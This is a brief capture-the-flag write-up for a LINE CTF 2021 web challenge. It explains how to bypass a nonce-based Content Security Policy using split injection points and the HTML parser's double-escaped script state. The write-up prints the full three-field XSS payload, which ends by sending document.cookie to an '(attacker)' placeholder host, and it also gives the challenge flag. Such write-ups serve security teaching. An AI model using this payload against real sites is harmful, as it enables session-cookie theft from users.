LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN
This page, CSP was applied. Since nonce-
directive is given, we should reuse exisitng valid-nonce script tags.
First, we can inject 16 bytes of display name in the admin-restricted page.
const sharedUserName = "{{ shared_user_name }}";
Second, we can inject each 64,128 bytes in render datas. However, since the single quote is escaped, we can't reuse this script tag.
Then, we can think the method commenting all things between first and second injection points, but </script>
has more priority over JS comment, it breaks the comment at the middle in normal.
But, when we open another script tag in html comment in script context, as <script><!--<script>
, internal HTML parser switches its status to script data double escaped state, which can ignore the </script>
in the middle.
display name : <!--<script>"}/*
title : --> /*
content : */ location.href='(attacker)/c='+document.cookie
LINECTF{0n1y_u51ng_m0d3rn_d3fen5e_m3ch4n15m5_i5_n0t_3n0ugh_t0_0bt41n_c0mp13te_s3cur17y}